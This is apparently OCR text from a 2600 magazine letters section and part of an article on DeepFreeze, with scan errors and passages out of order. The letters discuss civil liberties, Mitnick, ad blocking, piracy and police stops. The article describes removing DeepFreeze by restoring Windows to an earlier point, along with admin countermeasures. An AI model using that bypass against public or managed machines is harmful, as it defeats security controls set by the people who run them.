come in contact with, looking for anyone or anything 
out of the ordinary." 

Well, I'm no history buff but this really sounds ex- 
actly like the same thing that Hitler did. I remember 
reading a book (and I can't remember which) where 
the kids would even turn in their parents for doing 
something kind of suspicious. And I'm honestly won- 
dering, and have been wondering for a while, if this is 
the direction our country is heading in. Haven't we 
learned from history? I would like to think so, but 
somehow I can't seem to convince myself we did. 

Oh, but it's not like this hasn't happened before. 
Ever heard of McCarthyism? It all started with Sena- 
tor McCarthy who had a list of "known" commies 
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you're probably the most neutral people I know. Any 
input would be appreciated. 
Lectoid 

This may be the first time we've ever been called 
neutral. It's important in a case like this to take a step 
back and look at the conclusions you've already 
reached. People of Middle Eastern descent are con- 
sidered suspicious by default. Would you have given 
the same amount of scrutiny to someone who looked 
more like you? This guy being quiet also made you 
suspect something. But what's so unusual about some- 
one being quiet while they wait in a chair for some- 
one? As for the letters he was scribbling, are we really 
to believe that such a thing is a suspicious activity? 
Even if he was writing down the name of every gov- 
ernment agency he knew, so what? Having the words 
"Middle School" on an envelope really isn't that 
unusual either. 

We're not faulting you for having this thought 
process. What we're doing is asking you to examine it 
and try and understand why these simple actions 
could somehow plant the seeds of suspicion in your 
mind. Then imagine the entire country thinking along 
the same line. 

The fact is you will not know if someone is up to 
something evil unless you know them very well or are 
highly trained in spotting such activity. There are a 
few lucky exceptions to this but they tend to involve 
rather large clues, none of which were apparent here. 

You can rest assured that you didn't do anything to 
make you a bad person. 


Dear 2600: 

So why not put the army of 2600 to good use? 
Have you seen sites like www.jehad.net? They bla- 
tantly advocate the killing of American civilians and 
praise the September 11th attacks as acts of God. Why 
not point the readership to a couple of these websites 
and let them practice their skills? 

Surfgods 

Skills? You mean like getting Linux to run prop- 
erly or installing secure encryption? Or perhaps by 
skills you mean something destructive which is appar- 
ently what you think the hacker world exists for. You 
have to realize that the Internet represents the entire 
world, not just the United States. And that means all 
kinds of philosophies - some of which may seem ab- 
horrent - are represented. Destruction isn't the answer 
- you have an opportunity to see something firsthand 
and accept or reject it for your own reasons - as an in- 
dividual. You don't need some group acting on your 
behalf or telling you what to think. How would it be if 
in real life a group of fellow citizens went around de- 
stroying people because they didn't like what they 
were saying about us or because of major differences 
in philosophy? 

OK, that was a real bad example... 


Dear 2600: 

We must never forget that the attacks of Septem- 
ber 11th were above all else an attack on the American 
way of life and all that it stands for. Our Constitution 
protects us from abuses of power by our government, 
the very abuses that are so common by the govern- 
ments of countries like Iraq which back terrorism. If 
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dations and the indisputable truths-should--be-ad- 
dressed and examined by professionals as well as 
litical representatives of the people (there are still 
some honest ones out there), A level where the le 
system should take steps to correct itself and public 
admonish those who were involved in this case. Oth- 
erwise we are all in great trouble. | | 

I conclude where I started, Where is the ACLU? 

c 'hawk2000 

All of the questions you asked are ones that we 
also struggled with throughout the making of the film. 
It's frustrating not to get clear and definitive answers. 
And we wish it were that easy to actually get justice 
after demanding it. For now, we'll have to settle for 
trying to educate the masses. Please help spread the 
word and maybe you'll manage to get some sort of re- 
sponse from those responsible. 


Dear 2600: 

I have to commend Kevin Mitnick and William 
Simon for their amazing book: The Art of Deception. 
We have begun living in an era of secrecy and of sus- 
picion, and still the weakest factor in any situation re- 
mains the human element. It's hard to give this book 
just praise without sounding like an advertisement. 
Amazing work, Kevin, simply amazing. 

Poetics 


Dear 2600: 

I've picked up your last four issues and have found 
myself sincerely enjoying them - because of your lack 
of bias. In journalism it's difficult to separate your per- 
sonal feelings toward a subject from the writing you 
do on it, and 2600 is mainly focused on topics people 
feel strongly about. But what makes your publication 
superior, or unique in any case, is that you usually 
can't be caught putting down other people's views or 
campaigning your own. It's the mark of a well thought 
out organization of articles that allows your quarterly 
to maintain a calm composure during days of civil un- 
rest... days that won't end while we are alive simply 
because the public remains apathetic while power- 
hungry fatcats grow fatter. l'm not going to the ex- 
treme here - insurrection is only necessary when we 
agree it's necessary, but readers and writers of your 
publication seem to be of the intelligent group that un- 
derstands their rights and won't give them up without 
a struggle. 

Nietzsche 

Thanks for the kind words but we are most defi- 
nitely biased. It's really impossible not to be, espe- 
cially with this kind of subject matter. What's most 
important, as you point out, is to respect other opin- 
ions. Otherwise, there's little chance of a meaningful 
dialogue. 


Dear 2600: 

What's up with publishing an outdated article on 
shopping cart flaws (19:3)? The flaw that Mr. Moore 
discusses has been around for as long as I can remem- 
ber and has been fixed, for the most part, by shopping 
cart authors that are worth anything. As a former site 
designer/network admin 1 ran into this problem with 
some shopping cart software way back in 1998. I con- 
tacted the author and the problem was patched up 
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(FSTV) and was amazed to learn about the details of 
Mr. Kevin Mitnick. The reason for my letter is to basi- 
cally express my opinion on the case. 

First of all, where is the American Civil Liberties 
Union? Have they ignored Mr. Mitnick's case? This is 
definitely a case for the ACLU. 

Needless to say what Mr. Mitnick had to endure 
was unnecessary and illegal. I feel that the film should 
have concentrated a lot more on the constitutional is- 
sues and made it clear that one of our inalienable 
rights given to everyone living in the United States of 
America by the U.S. Constitution [the supreme law of 
the land] is the right to a speedy trial. 

What I fail to understand and what the film does 
not fully explore is how any jurisdiction was able to 
keep a man incarcerated for such a long time without 
a trial. The film leads me to believe that Mr. Mitnick 
was deprived of his freedom until he acquiesced to a 
guilty plea. Is this the case? Was the government 
holding him hostage in exchange for a guilty plea? 

Should this be the case, then the entire movement 
and Mr. Mitnick should file suit against all parties in- 
volved in the unlawful detention, and the civil liber- 
ties and constitutional abuses toward Mr. Mitnick. 
The film concentrated heavily on what Mr. Mitnick 
did not do, on the lies various writers were writing 
about, on the hacker community, and Mr. Mitnick's 
detention without a trial? But I believe it failed to 
drive the nail down to the core by not mentioning the 
constitutional erosion his case represented and the 
danger of his situation for the sake of all Americans. 

Please do not get me wrong. I respect all of the 
hard work that went into the film and the movement 
as a whole, I am just offering a perspective which I 
believe would get a stronger response from the legal 
and political community. | would not want to think 
that all of the hard work of the civil liberties move- 
ment of the 1960s or the injustices and the suffering of 
those who then fought very hard to keep the integrity 
of the U.S. Constitution and the Bill of Rights were 
suddenly forgotten when Mr. Mitnick was denied his 
freedom, placed into solitary confinement for eight 
months, and left incarcerated for about four years 
without due process! 

Any state representative, Senator, or Congress- 
man should hear Mr. Mitnick's story and all parties in- 
volved in this abusive behavior should be prosecuted. 
This is of paramount importance. Perhaps | am naive 
and I have too much faith in our Constitution and 1 
cannot begin to imagine how these abuses could have 
been so blatantly executed by the authorities. 

Any competent constitutional lawyer should have 
been able to have him released. It is very very difficult 
lor me to believe the events as they were explained in 
the film. I greatly respect the effort, time, and energy 
that went behind the scene and the entire Free Kevin 
network. However I cannot understand why one of the 
most powerful weapons and protection (the U.S. Con- 
stitution) was never mentioned in the film. 

Mr. Mitnick's liberty as well as all of our liberties 
are at great risk. His case should not be forgotten and 
the Free Kevin movement should evolve to the next 
level. A level of awareness, education, and realization 
where his case should be made known on legal foun- 
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ries a penalty of up to five years in prison for a first of- 
fense. Violation of the NFA of 1934 (for example 
owning what the DoD calls an assault rifle, sawing off 
a shotgun, or making your own gun of any kind) car- 
ries a penalty of up to 10 years in prison. I also feel 
(although this is more subjective) that the plethora of 
laws governing firearms ownership are more onerous; 
I've never been fingerprinted in order to buy a packet 
sniffer, or had to appear in person at the sheriff's office 
for a license to carry a password hash cracker. I do not 
risk five years imprisonment for forgetting to clear 
some software off my laptop when I go to visit my 
parents in New Jersey; if 1 accidentally leave any 
standard hunting ammo in my car, I risk that. 
Charles 

If you act like an idiot with deadly weapons, you 
should be prevented from continuing to do so. It's 
amazing how many people see that as a violation of 
their rights yet will blindly support idiocy like the Pa- 
triot Act without a second thought. What we don't sup- 
port is the attitude that anyone who suggests any form 
of regulation of firearms is somehow advocating dis- 
arming the populace, no doubt in furtherance of some 
hidden agenda. It's an hysterical reaction that only 
manages to demonstrate how bad the problem is. 
There are all kinds of legitimate reasons to own guns. 
But, being deadly weapons, they cannot conflict with 
the needs of society. That's why we frown upon walk- 
ing around schools and churches with firearms, re- 
gardless of what you think the Constitution says you 
can do. It's why deranged individuals tend to be dis- 
couraged from becoming gun hobbyists. These direc- 
tives are coming from the people, not from some 
invading government. 

If we can get major politicians clamoring for the 
rights of hackers and the "National Hacker Associa- 
tion" challenging the government to pry our key- 
boards "from our cold, dead hands" then maybe 
hackers will have a chance of being treated better 
than gun owners. Until that day, it's an absurd 
comparison. 


Dear 2600: 

Regarding the cover of 19:2, I was wondering if 
that "building" that kinda looks like the U.N. is actu- 
ally an integrated circuit that I've seen in some touch- 
tone phones from the 70's and 80's, and the round 
"building" being a receiver or speaker of some sort. Is 
that right? I noticed because the "building" is not fac- 
ing the same direction as any of the others. Nicely 
done! Thanks for your magazine - love every minute I 
read it. 

Shadowfax 

You're very observant. But we really don't deserve 
the credit this time. The round building is actually 
Madison Square Garden with the surrounding ones 
being part of the Pennsylvania Station complex in 
Manhattan. Across the street (in the middle of the 
cover) is the Hotel Pennsylvania which is where the 
HOPE conferences are held. A trained eye can see the 
little bridge that hooks two of the conference rooms 
on the top floor together. 


Dear 2600: 
I am a 2600 subscriber. Recently by chance 1 
viewed Freedom Downtime on Free Speech TV 


definitely looks like killing a dog with a cruise mis- 
sile. The first thing I did was start up Mozilla and see 
what it had in its preferences, and | saw that not only 
does Mozilla have reasonably flexible cookie block- 
ing stuff, it has image blocking stuff as well. Here's 
the easy two-step process that doesn't require firewall 
software or root access (a definite selling feature on 
those lovely university unix labs): 

1.) Change your cookie setup. Only accept them 
from the originating web site and tell it to ask before 
storing a cookie. Mozilla can remember your decision 
about cookies, so the dumb popups are a one-time 
affair for sites you visit regularly. 

2.) Find a site with doubleclick.net ads, I googled 
for "funny puppies" and won on my first try; "block 
images from this site" on the ad (right click, duh). I'm 
moderately annoyed that they didn't let you add sites 
to block images from in the preferences menu, but 
you can't win them all, I guess. 

I don't know what they manage to squeak by with 
javascript, but Mozilla lets you disable javascript's ac- 
cess to cookie data, its ability to make cookies, 
change images, and so forth, so it can probably be 
mostly curbed. The preferable solution would be to 
ignore javascript and images based on a configurable 
list of keywords. 

Opera has similar features, but I don't think they're 
as complex. IE's approach to this seems to be along 
the lines of telling the user, "don't try to hide from my 
money- grubbing masters or I will crash your 
computer.” I haven't checked konqueror yet. 

Bob M. 


Dear 2600: 

This is a response to a letter written by quel in 
19:2 which suggests blocking web ad images by 
adding each image server IP to Linux netfilter rule ta- 
bles. There are several much easier ways to block ads, 
such as: 

1.) Add the server's name and the address 
127.0.0.1 to your /etc/hosts file. (Windows has a hosts 
file too at C:\windows\hosts or C:\winnt\system32\dri- 
vers\etc\hosts.) 

2.) Use a browser (such as Mozilla) or browser 
plugin that can give you better control over the im- 
ages that the browser downloads and displays. 

3.) Most importantly, try out a personal web proxy 
such as  Privoxy, Adzapper, WebWasher, or 
Guidescope. If you haven't heard of any of these, 
Google is your friend. à; 

Ei 


Dear 2600: 

Thanks for publishing so much discussion of the 
gun control issue. Despite the fact it is not directly 
connected to hacking or freedom of information, your 
readers seem to be very interested in it. I'm a new 
reader who picked up a bunch of back issues at H2K2, 
and I've been following the debate backwards to 18:3. 
I'm sorry you don't support the right to bear arms the 
way, say, American Rifleman (the main NRA maga- 
zine) supports freedom of information. 

I would like to point out a nonsense statement: "If 
only hackers were treated as well as gun owners in the 
United States!" Violation of the DMCA of 1998 car- 
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boys over. They told me that I was interfering with: 
officer's line of duty and that I could be thrown in j 
for such behavior. I am not one to get thrown in j 
(especially at the age of 18, still living with parents), 
so I stepped aside. After a 30 minute search, they dë- 
cided the car was fine and there was no reason to ho! 
me any longer. They even had drug dogs there to 
everything out... looking for that kilo of cocaine 
every cop just knows is in there somewhere: Needless 
to say, I think that this is a perfect example of what the 
media has done to "hackers" and the image they have 
drawn of us. I would love to press charges, but being 
an 18 year old entering college, I simply don't have 


the funds. 
Evnglion 
You acted entirely properly by questioning them, 
keeping your cool, knowing when to back down, and 
letting the world know what happened. Unfortunately 
this kind of thing will continue to happen. It's always 
a good idea to get as much information as possible 
from the scene - car number, badge number, names, 
etc. in the event that you decide to pursue matters 
later. Most people choose not to and we completely 
understand why. 


Dear 2600: 

First off, great magazine - you've managed to in- 
form the hacker world of many new laws, news, ideas 
that otherwise we wouldn't experience through main- 
stream media. 1 had closely followed your trouble 
over the domain fuckgeneralmotors.com. Upon hear- 
ing this, I too was outraged that because a big corpo- 
ration saw some offense to this, they should go strip 
away a component to our First Amendment. So in 
support of your effort, I registered www.generalmo- 
torssucks.cjb.net. I successfully maintained the site 
which I linked to ford.com. But not too long ago, I 
found that my page had been shut down without no- 
tice, my password to my account was invalid, and 1 
have had no contact from any .cjb rep. I am consider- 
ing filing a lawsuit or at least notifying the public of 
this so they can also voice their concern. Any 
thought/word would be appreciated. 








im source 

Since you're using this company's name, they have 

the ability to simply disconnect you (although they 

seem rather immature for doing it the way they did). If 

you want to make any kind of statement using a do- 

main name, you should register the entire domain 

name under .com, .net, etc. and then find service 

through the provider of your choice. If they shut that 
off, it's a much bigger issue. 


Dear 2600: 

I was in Wal-Mart in Hammond, Indiana the other 
day - the day the Spider-Man DVD and VHS came 
out. So I figured I'd go pick up a copy as long as I had 
the cash. So I walked over to electronics and stood in 
line. Note that I am 14 years old and I look more like 
16. I asked to buy the Spider-Man DVD (they had it 
behind the counter) and they said "You have to be 17 
or older with ID to be able to buy this movie." Now 
the movie is freaking rated PG-13 and to top it off 
they had the VHS sitting right on shelves near the 
cash registers outside electronics and by music in 


All the best with your endeavors, Thanks for 
telling like it is instead of how they want us to think it 


is. 
deejayred2001 


We have no doubt that some of our readers will 
disagree but we find the above treatment all too com- 
mon and symptomatic of some serious problems in 
our culture. Unless you were soliciting customers 


trom the elementary school or leaving brochures in 


the pews of the church, you should have been treated 
as any other member of the community. This kind of 
coexistence happens in other countries all the time 
without any adverse effects. We, on the other hand, 
seem to be moving ever closer to a fundamentalist 
hell. 


Dear 2600: 

Thought I would tell you guys about my web host 
- and how they have annoyed me. They were fine for 
about half a year, then suddenly a few days ago my 
site disappeared. All the files have been deleted and 
all that is visible is a placeholder. I have been locked 
out of the admin interface, too. What annoys me is 
that 1 had no warning, no explanation, and no chance 
of backup. It simply switched off. I have tried contact- 
ing them. They won't get back to me via email and 
their phone number doesn't work. It is companies like 
these that really disappoint me. It's gotten harder to 
find decent, proper companies that don't treat 
customers as if they were meaningless. 

Matt 

There are a couple of lessons here. Always keep 
your own backups. Never rely on people you don't re- 
ally know to do anything except cash your checks. 
And whenever possible, try to run your site yourself. 
That way, the most you can lose due to someone else's 
incompetence, ill will, bankruptcy, etc. is a temporary 
loss of bandwidth. 


Dear 2600: 

1 work as a delivery driver here in North Carolina 
and I usually get home rather late. I live in a fairly 
small town (2,000 residents and 10,000 college kids) 
and my car is very easily identifiable by the numerous 
computer related stickers on the back of it. I was 
stopped by the law at a license check... a fairly routine 
happening. They looked at my license and then asked 
me to pull off to the side - an officer would be with me 
"shortly." After waiting for ten minutes, the officer 
who put me aside asked me to step out of the car. Now 
remember, I am a delivery driver, and common sense 
would tell you that I have a valid driver's license and 
also that I would not be under the influence of any 
substance (perhaps caffeine?). So naturally, I was a bit 
puzzled by this. He then asked me if he could search 
my car and of course I said (in a polite fashion), "No, 
you may not. I do not feel that there is any reason for 
you to search, and certainly no probable cause." Oh, 
but this officer found probable cause... there was a 
stack of 2600: The Hacker Quarterly in my back seat 
dating from 1998 through 2002. He said that this was 
à "suspicious magazine" and he was baffled that I 
would even think to have such a thing in my posses- 
sion. 1 told him that I did nor believe this was any rea- 
son or cause to search my car, so he called one of his 
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idealistic and good-sounding as 2600 is, that doesn't 
make it 100 percent correct. I'm not accusing 2600 of 
anything, I'm just saying that you should question 
everything to make sure it works for you. Being 
spoon-fed by other hackers is the last thing we need. 
Question This. Question Life. Question Star Trek. But 
more importantly, Question Everything. ii 
We couldn't agree more. Unquestionably. 


Injustice Department 


Dear 2600: 

While you may feel like this letter is an attempt at 
someone using you as a soapbox to rant about repres- 
sion of their right of free speech, it is actually my ac- 
knowledging some intriguing similarities between 
your lawsuits and my job (if that makes any sense). 

I work at an adult video/toy store in California in a 
town of less than 10,000, although we serve approxi- 
mately 100,000+ clientele from all over the area. Due 
to recent events, our store will be forced to shut its 
doors forever due to ignorance and hatred aimed at us, 
simply because we are looked down upon by our local 
government and several religious circles. In more de- 
tail, the town government instated a law that prohibits 
any adult related shops from conducting business 
within 2000 feet of a school and 1500 feet from any 
church. This is ironic because we are two blocks away 
from an elementary school and four blocks away from 
our local Presbyterian church, and the law was 
instated two years after we had opened! 

Anyway, our store has always obeyed the strict 
laws that the state regulates our industry by, and we 
have always been in cooperation with these as well as 
any city ordinances, with exception to the one stated 
because of obvious reasons. We have been in constant 
court battles, won every single appeal, and still our lo- 
cal government has us in their crosshairs. 

The clincher here is a recent overnight arson at- 
tempt on our store which did approximately $45,000 
in damage and also ruined our already tarnished im- 
age when the newspapers printed the city's response 
to it: "That is the kind of people that ****** Video 
World attracts. It is their own fault for bringing 
lowlife trailer trash into the city, and they get no sym- 
pathy from us." That is directly out of our local 
newspaper. 

The store owner decided to shut down in October. 

I now have to take two jobs to match the salary I 
was making in order to keep rent and afford tuition. 
My insurance has already been canceled and I have to 
pay $95 every other week for a bottle of insulin so I 
can live. Yet the most hurtful thing of all is that I have 
lost close friends, some family members have turned 
their backs on me, and I have even been refused ser- 
vice at a local grocery store because the owner knows 
where I work! 

And why exactly? Religiously influenced and bi- 
ased government taking a stranglehold on a privately 
owned adult shop simply because they decided to 
conduct business. Not because they did anything 
wrong, but simply because it existed and certain 
people didn't want it to. 


within days. I'm wondering if Mr. Moore has in- 
formed the company in the article about their prob- 
lem? If not, as an ethical "hacker," I think that would 
be the honorable thing to do. Our job is to help people 
learn from their mistakes, not punish them for it! 
JaMm3r 
We exist to report on discoveries and findings. 
Anything beyond that, good or bad, is extracurricular. 
As for this article, you seem to be against its being 
printed regardless of whether or not it was outdated. 
If all of the bugs were fixed before we printed them, 
then we would indeed be printing outdated info and 
getting more complaints like yours. But non-outdated 
info leads to implications (like yours) that we're pun- 
ishing people and not being ethical. It seems we can't 
win, 


Dear 2600: 

Thank you for your reply to my letter regarding 
people's saved email files being shared on Kazaa. 
While I don't agree that reading other people's email 
which they are sharing is "clearly an invasion of pri- 
vacy" in the same way that reading private mail my 
neighbor posts on a billboard on his front lawn would- 
n't be, I respect your opinion on the matter. Also, I 
should have added that it's always best to email those 
found affected and let them know they're sharing the 
wrong stuff. I've gotten both thanked and threatened 
in response to that, which is nice. 

Rob T. Firefly 


We didn't mean to imply that the privacy invasion 
was your fault. And what you did certainly isn't a 
crime. But those who go around using other people's 
stupidity to invade their privacy are still invading 
their privacy, albeit in a passive way much like listen- 
ing in on private phone calls broadcast in the clear. 
By letting the world know, you performed a valuable 
service. 


Dear 2600: 

This is in response to HJH's article "A Nasty NT 
Bug" in 19:2. I'm happy to say that the bug reported in 
the article has been patched. Whereas | an unsure 
when Win 2000 was patched, Win XP was fixed by 
SP1. Also, the current Beta of Win .NET is com- 
pletely immune from this bug. I guess it just goes to 
show, when 2600 talks, Microsoft listens. Good show, 
and keep up the good work. 

Jason Argonaut 


It's quite possible this was reported in some other 
way but thanks for the good thoughts. 


Dear 2600: 

I agree with the philosophies of your magazine on 
one level. I've also noticed it is easy to get caught up 
in. And sometimes I find myself agreeing with what 
you advocate and other times questioning it. While I 
love the info, I have to question it. If we never ques- 
tioned, we would all be sheep. While 2600 is defi- 
nitely an authority in the hacking world (or 
underworld if that is easier to swallow), I urge the 
readers to mill over and ultimately question what they 
read. Because even if they are fellow hackers, you 
don't have to agree with them or their ideals. And as 


Page 36 










bit puzzling. Do you think a hacker magazines 
to go any easier on you for being a complete mo 
than any other part of society? Not likely, We're inter- 
ested in how the technology works li $ 
else reading this. But there's a rather major differen 
between that curiosity and an action that puts peð- 
ple's lives at risk - not just people stuck in traffic 

ambulances but those who decide 7 enda the barri- 
ers after waiting for a very long time:-Yowcan't- 

anything about the past but you can put a stop to this 
crap now and in the future before it really blows up in 
your face. If that actually got through to you, be sure 
to share your enlightenment with your friends. 


Observations 


Dear 2600: 

۸ few weeks ago I ordered the DES encryption 
shirt alongside my subscription of your magazine and 
received it all without problems. Thanks for the fast 
service, but... the shirt doesn't seem to feature a DES 
Encryption schematic to me! The day before yester- 
day I had dinner with two friends who questioned the 
schematic to be DES. So when I had the time yester- 
day night I read through Applied Cryptography and 
found out DES is not working this way. Although I'm 
definitely not a crypt analyst I could tell something 
was wrong. So I searched the book for more algo- 
rithms and learned about the IDEA algorithm. Its 
schematic looks almost exactly like the one on my 
shirt. There's only one difference: The XOR and Ad- 
dition signs have been switched in the explanation on 
the bottom of the shirt. Now I'm confused. Is this 
thing on purpose? In a quick search on the Internet I 
can't find evidence on this, so I'm still confused. Can 
you please help me out on this one? 

Freddy 

You're right about the IDEA algorithm. As to the 
reversal, perhaps it's one of those mistakes we keep 
making to keep people on their toes. 


Dear 2600: 

I just found out something quite disturbing at my 
workplace. I'm an analyst for a major ISP in Canada 
and 1 had an interesting conversation with my friend 
at the abuse department. It seems that the RIAA is 
pressuring us to shut down customers who have been 
involved in file sharing, especially on the Kazaa net- 
work. Apparently, the volume of threats by the RIAA, 
Sony, and other organizations is around 1000+ emails 
per month. They are receiving detailed logs with IP 
addresses and the names of the files that have been 
traded (even though everyone knows it's no proof). 
They've installed a new script on the Radius server to 
break down logs in smaller chunks so they can be 
searched faster. Needless to say, that is quite disturb- 
ing. So far, they have not shut down anyone, only sent 
warnings by email to the "offenders." They're in the 
process of deciding what to do next. I'll keep you 
posted. I thought you would find this interesting. 

Quebec 

It might be interesting to find out exactly how 
they're getting these logs in the first place. Are they 
perhaps running some sites of their own? Or is your 
ISP monitoring what their users do? 


continued on page 48 


cause of you the ideals and principles of many have 
been changed. 
Quiet Riot 
Answering these questions would undoubtedly 
lead to more questions and the need for more answers 
and a possible Senate inquiry. Let's just say it's a 
pretty picture and leave it at that. 


Dear 2600: 

Maybe I have something wrong or have misunder- 
stood H.R. 5469. Why are radio stations that broad- 
cast an FM signal to my car allowed to continue to 
simulcast over the Internet with no proposed legisla- 
tion against them? Why have the Internet radio sta- 
tions been singled out? Did I miss something? 

ddShelby 

Any Internet broadcast is affected in some way. 
Broadcast stations are no exception. But it serves 0 
prove the absurdity of the legislation as broadcast sta- 
tions can have as many people listening to them over 
the airwaves as they can get without incurring any ex- 
tra fees. But for every listener on the Internet (which 
already carries a bandwidth cost for each stream), an 
additional fee is levied. Imagine what would happen if 
stations were charged that fee for every listener esti- 
mated by the Arbitron ratings service. The most popu- 
lar stations would probably go broke. (Maybe it's not 
such a bad idea.) 


Dear 2600: 

I was wondering if an article about OfficeMax 
would be of interest. I've read the articles about Radio 
Shack and recently the one about Target, and I was 
wondering if your magazine would be interested in an 
article about OfficeMax. Things such as store security, 
breaking through the security on the HP Custom 
Computer Centers/logging in as administrator, the 
unix pm e and other related topics. I would be 
more than happy to submit such an article if it would 
be of use. Please let me know so I could get started. 
Thank you. 


* 


Ganja51 
If we print an article about one retail outlet, natu- 
rally we're interested in others. That's not a guarantee 
that we'll print this specific article but the topic cer- 
tainly qualifies. The general rule of thumb is that if 
you have an article to write, just write it and send it 
in. We may not print it but at least you will have writ- 
ten it which is generally a good thing to do. 


Dear 2600: 

| think that your magazine is the greatest. I read it 
all the time at my local Chapters Bookstore. I always 
read it cover to cover. It's the best. 

| have a situation that 1 don't know what to do 
about. In my neighborhood we have a fun game. We 
ploce cans on the railroad tracks to make the traffic 
bamer arm come down. The winner is the one who 
makes the longest lineup of cars. 

Last week I was sure I would win the contest. 1 
picked a busy day at 5 pm. I did everything properly. I 
went away and came back an hour later to make sure 
that I had the longest car line up of all my friends. 
there was an ambulance in the stuck car line. I feel 
very very guilty about this. What should I do? 

Tony 

Why vou feel compelled to ask us about this is a 
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yours. I'm not trying to suggest anything negative 
about your magazine. It may look as though I am. 1 
just enjoy this type of reading material and [ get 
through your magazines pretty quickly because of 
that. 
Super-Fly 
There are plenty of Internet zines out there but we 
haven't found any other paper publications that are 
devoted to the hacker world. Occasionally we see an 
abortive attempt. They usually don't succeed for a 
number of reasons - they try to get too big too fast, 
they get spooked by the legal threats and hate mail, or 
they simply realize what a commitment it really is. We 
need a good deal more zines covering this stuff, not 
just here but all around the world. 


Dear 2600: 

I just read the article on 802.11b (19:2) and it told 
me 99 percent of everything I wanted to know about 
802.115 networks except for the one thing I really 
wanted to know. In the article it said they used a 
"magmount antenna on the roof." How do I hook this 
up to the card - or does the card just use the antenna 
through osmoses? I would love to scan the surround- 
ing area, but need signal strength. 

In a TránCe 

Many 802.11 cards have antenna jacks on them 
but for those that don't you're pretty much out of luck. 
You may want to ask google about your card and "an- 
tenna jack" to see if there is a way you might add one, 
but it's generally not a reliable hookup. Even so, 
you'll almost certainly need an adapter (commonly 
called a "pigtail") to go from your antenna's jack 
(probably an "N" jack, look for pictures) to your 
card's jack (probably SMA). 


Dear 2600: 

I was wondering why there is something strange 
on page 33 at the bottom of the page where it should 
say "Page 33?" Each time there is something different 


but it is never correct. 
QuietShadow 
We get more mail on this than on any other subject 
by far. And yet, everyone who writes in seems to know 
what page number they're talking about even though 
they claim the page number information is faulty! It 
defies all logic. 


Dear 2600: 

I have a folder on my computer that 1 cannot open 
or manipulate in any way. It is located in my C^ drive 
and when I double-click it, an error message pops up 
that says "This folder does not exist." Can you tell me 
what has happened? 1 
Phate . "n 

Your problem appears to be that you're running — 
Windows. Other than that, this is one we weren't a. 
to find an immediate answer for. We'll let you know 
what we find. 


Dear 2600: 

I was wondering if you could please tell me who 
is the man on the right side of cover 19:3. Also if you 
could please enlighten me as to what "might" be on 
the disk and roll of film. Keep up the good fight - be- 


electronics. Why in the hell would they card me for 
Spider-Man? Just another case of morons power 
abusing. 
Dune Tanaka 
Definitely moronic behavior. If you're not in the 
mood for a confrontation with the store manager, we 
suggest writing a polite but firm letter to the main 
headquarters telling them of your unpleasant experi- 
ence. Oftentimes this leads to some sort of resolution. 


Dear 2600: 

I gave a speech today at PSU and started by show- 
ing people how easy it is to get on wireless networks - 
even those that are encrypted. I'm sorta nervous now 
that I'll be hauled away in a black van tonight. I just 
felt the need to write something in case l'm never 
heard from again! 

It's a shame that we must live fearing that our aca- 
demic works will come back to haunt us. 

(I also plugged 2600 during the speech.) 


That's right, drag us down with you. 


Thoughts On Piracy 


Dear 2600: 

I am an avid software pirate. Much of the software 
that I use is pirated because I am one poor bastard. 
However, being a software developer myself, I realize 
the importance of getting what is due for your hard 
work. Wait a minute? Huh? How can I develop soft- 
ware and condone piracy? Here's my thinking on the 
matter. First of all, when I benefit in any way other 
than purely educational, | make a point of purchasing 
a full copy of whatever program I'm using. I had a pi- 
rated version of Dreamweaver for quite awhile. When 
I finally started posting real web pages developed in it 
I purchased the full version (Version 3, but that's good 
enough for me right now). I also have a pirated copy 
of 3D Studio Max that I've had for years. The version 
I have is old, but I have fun with it. Will I ever use it in 
a professional sense? No. Should I pay massive 
amounts of money to use something that I just fart 
around with on occasion? I don't think so! Does the 
developer lose out because I didn't pay for my copy? 
Let's put it this way... if I were forced to decide today 
between keeping it and paying the money, or giving it 
up, it'd be no contest. I'd give it up. I don't need it that 
bad. I'd never used it in a way to justify the price. So 
what does the developer lose? Money that they'd 
never have anyway if their program were completely 
pirate proof? 1۶ the day comes, and 1 doubt it will, 
when I use what I create in 3DSMax for something 
more than idle fun, I'll pay for it. Until then, I see no 
loss by anyone. I hope others use the software I create 


in the same manner. 
11269U 


Questions 


Dear 2600: 

Does your magazine have any competition in its 
class? I'm sure you know many magazines do have 
competitors, however I've never seen competition to 
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uninstall DeepFreeze, even while it's on and 
frozen, by simply restoring the computer to a 
point before when DeepFreeze is installed! It 
basically does to DeepFreeze what DeepFreeze 
does to the rest of the computer. Any sysadmin 
should disable System Restore in such a public 
setting as would justify DeepFreeze from being 
used, With those two precautions in effect, it be- 
comes very difficult to get around DeepFreeze. 
With the implementation of a central, unique 
console, security involving the OTP is a little 
better (admins have control over it now at least). 

Finally one note on the usage of DeepFreeze 
on NT based machines. For some reason, Deep- 
Freeze seems to be dependent on the SID. In an 
environment that uses image-casting software 
to deploy images to multiple computers, Deep- 
Freeze screws up royally after running SysPrep 
or refreshing the SID, usually requiring a for- 
mat to fix the problem. It's important to pull it 
off before refreshing the SID, and then put it 
back on. Speaking of imaging, one weird quirk 
with Symantec Ghost and DeepFreeze is that 
occasionally, when performing a hard reset on a 
computer or rebooting after the computer has 
reached the "it is now safe to shut down your 
computer" screen, it will prompt you with a 
screen saying "Operating System not found." 
It's a minor annoyance, as a reboot fixes the 
problem, and it's rather rare. 

I actually keep a copy of DeepFreeze around 
for my home computer. Why? It makes a great 
sandbox to play around in. I can do anything I 
want and screw up my system as much as possi- 
ble, and the fix is only a reboot away. Anyone 
wanting to fool around on a computer with 
DeepFreeze on it can do so without worrying 
about messing up the software. You can even 
power off or reset the computer without the 
proper shutdown procedure. DeepFreeze doesn't 
care if Windows shut down improperly - it 
restores it to a nice state anyway. 

Hopefully you've gained a little bit better un- 
derstanding of this program. It's becoming more 
widely used in the world, and understanding its 
strengths and weaknesses helps the curious bet- 
ter use or appreciate the program. It's also a 
great example of how a strong piece of software 
can be bypassed due to the ignorance of an 
administrator. 
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One Time Password option, relocated from Hy- 
per Technologies to the console. However, if 
you want to have a static password, you have 
the option of setting up to five and the option to 
change any of those five passwords. You also 
have the option to freeze individual drives or all 
drives to schedule "maintenance time" (times of 
day where the computer reboots and is automat- 
ically thawed for a set period of time), an idle 
reboot timer (after x number of minutes of no 
keyboard/mouse activity, the computer reboots 
and refreshes itself in the process), the opportu- 
nity to create a "ThawSpace," which is basically 
a mini-file given a drive letter that isn't frozen 
by DeepFreeze, and the ability to lock out ac- 
cess to the clock/calendar, and disable the Ctrl- 
Break function at bootup. After all this is done, 
you save the configuration, create a setup file, 
